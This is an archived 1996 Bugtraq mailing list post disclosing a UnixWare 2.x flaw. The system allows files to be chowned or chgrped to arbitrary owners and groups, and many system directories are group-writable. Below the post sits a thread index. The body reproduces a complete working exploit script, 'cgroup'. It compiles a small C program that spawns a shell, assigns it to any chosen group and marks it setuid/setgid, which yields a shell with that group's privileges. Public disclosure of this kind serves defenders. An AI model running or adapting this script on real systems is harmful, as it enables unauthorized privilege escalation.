Bugtraq mailing list archives
More on UnixWare 2.x vulnerability
From: tv () pobox com (Todd Vierling)
Date: Sat, 24 Aug 1996 14:48:48 -0400
I've found out a more about UnixWare 2. It seems the system (and I don't know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer) allows chown'ing a file *to* any arbitrary user and group. Hm, lessee. Create a file that uses up all the available space in /tmp, then chown it root:bin. Okay, now someone else tell me who created that file. Anyway, back to the setgid problem. I've found an exploit script (it's not all that difficult to do by hand, anyway...) on an FTP site pointed to by the floating post about this bug. It follows. While browsing the default installation of UnixWare, it seems a couple *hundred* directories, including particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is bad, very bad. ===== #!/bin/sh # cgroup - pick a group id for unixware (run as cgroup <groupid>) cat >/tmp/.$$.c <<_end_ #include <unistd.h> int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); } _end_ cc -o /tmp/.$$ /tmp/.$$.c rm -f /tmp/.$$.c chgrp $1 /tmp/.$$ chmod 6100 /tmp/.$$ /tmp/.$$ rm -f /tmp/.$$ ===== == Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! == == System administrator/technician, Internet Access Group, Orlando Florida == == Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
Current thread:
- IE 3.0?, (continued)
- IE 3.0? InterAccess Support Manager (Aug 22)
- Re: IE 3.0? Dave Andersen (Aug 23)
- More on the UnixWare problem Todd Vierling (Aug 23)
- resolv+ and finger... C. Hodges (Aug 23)
- Vulnerability in the Xt library Aleph One (Aug 24)
- Re: Vulnerability in the Xt library Stefan `Sec` Zehl (Aug 25)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 27)
- Re: Vulnerability in the Xt library Casper Dik (Aug 28)
- Re: Vulnerability in the Xt library Mike Neuman (Aug 28)
- IE 3.0? InterAccess Support Manager (Aug 22)
- RFD: libsuid VaX#n8 (Aug 24)
- More on UnixWare 2.x vulnerability Todd Vierling (Aug 24)
- Re: (WORKAROUND) More on UnixWare 2.x vulnerability Hannu Laurila (Aug 24)
- polyglots (multi-language programs) John Nemeth (Aug 24)